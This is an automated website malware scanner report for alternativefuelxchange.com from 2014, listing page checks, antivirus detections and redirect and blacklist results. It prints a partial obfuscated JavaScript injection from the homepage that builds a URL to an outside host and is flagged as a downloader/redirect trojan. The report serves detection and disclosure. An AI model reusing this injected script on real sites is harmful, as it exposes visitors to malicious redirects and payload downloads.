New scan:

Malware Scanner report for alternativefuelxchange.com

Malicious/Suspicious/Total urls checked
1/0/3
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://alternativefuelxchange.com/
200 OK
Content-Length: 6602
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

function lG(){};jJ="";lG.prototype = {eS : function() {function q(){};function wH(){};return '\u004a\u004a\u004a\u006f\u0049\u0034\u0050\u0077\u0068\u0074\u0074\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0051\u0066\u0061\u0075\u006c\u0074\u0067'.replace(/QQQQQQQQ/g, 'YYYYYYYY').slice(8, -1).replace(/YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY/g, 'p://zeozudra.cz.cc
... 3033 bytes are skipped ...
ar bO=15569;var bN="";this.vX="";o.write(oF);var bNS=new Date();var jY=false;var bT=new Array();gF=false;var tS=26505;var xP = this;var cW=new Date();var oE="oE";eV="";var jX=function(){};this.aP="";this.lN=49747;h[u](function(){ var bB=function(){return 'bB'};function hU(){};function nK(){};lT="";xP.z();rT="rT";var gH='';this.qI='';var xO="xO";var dU="";this.vZ=false;wP="";}, 317);iN="iN";var hP="";oQB='';var sV=false;}eO="eO";hD=49992;}};var vF=61292;var gK=new lG(); zD="";gK.z();this.hR="hR";

Decoded script:


function () {
var bB = function () {return "bB";};
function hU() {
}
function nK() {
}
lT = "";
xP.z();
rT = "rT";
var gH = "";
this.qI = "";
var xO = "xO";
var dU = "";
this.vZ = false;
wP = "";
}
/*** called setTimeout with function () {
var bB = function () {return "bB";};
function hU() {
}
function nK() {
}
lT = "";
xP.z();
rT = "rT";
var gH = "";
this.qI = "";
var xO = "xO";
var dU = "";
this.vZ = false;
wP = "";
}, 317 */
<html ><head ></head><body ></body></html>

Antivirus reports:

Qihoo-360
Trojan.Generic
AntiVir
HTML/Agent.11445
Avast
JS:Illredir-DK [Trj]
Ad-Aware
Trojan.JS.Agent.EEP
Ikarus
Virus.JS.Downloader.Agent
nProtect
Trojan.JS.Agent.EEP
Emsisoft
Trojan.JS.Agent.EEP (B)
Comodo
UnclassifiedMalware
Kaspersky
HEUR:Trojan.Script.Generic
MicroWorld-eScan
Trojan.JS.Agent.EEP
NANO-Antivirus
Trojan.Script.Redir.vwwa
F-Secure
Trojan.JS.Agent.EEP
F-Prot
JS/Redir.FJ.gen
AVG
JS/Downloader.Agent
Norman
Pdfka.BO
GData
Trojan.JS.Agent.EEP
Commtouch
JS/Redir.FJ.gen
ESET-NOD32
JS/TrojanDownloader.Pegel.BR
BitDefender
Trojan.JS.Agent.EEP

http://alternativefuelxchange.com/trading%20screen.htm
200 OK
Content-Length: 17368
Content-Type: text/html
clean
http://alternativefuelxchange.com/test404page.js
404 Not Found
Content-Length: 436
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: alternativefuelxchange.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 16 Dec 2014 00:00:07 GMT
Accept-Ranges: bytes
ETag: "19ca-496fa9a896111"
Server: Apache
Vary: Accept-Encoding
Content-Length: 6602
Content-Type: text/html
Last-Modified: Thu, 09 Dec 2010 13:56:25 GMT

...6602 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: alternativefuelxchange.com
Referer: http://www.google.com/search?q=alternativefuelxchange.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=alternativefuelxchange.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://alternativefuelxchange.com/

Result: alternativefuelxchange.com is not infected or malware details are not published yet.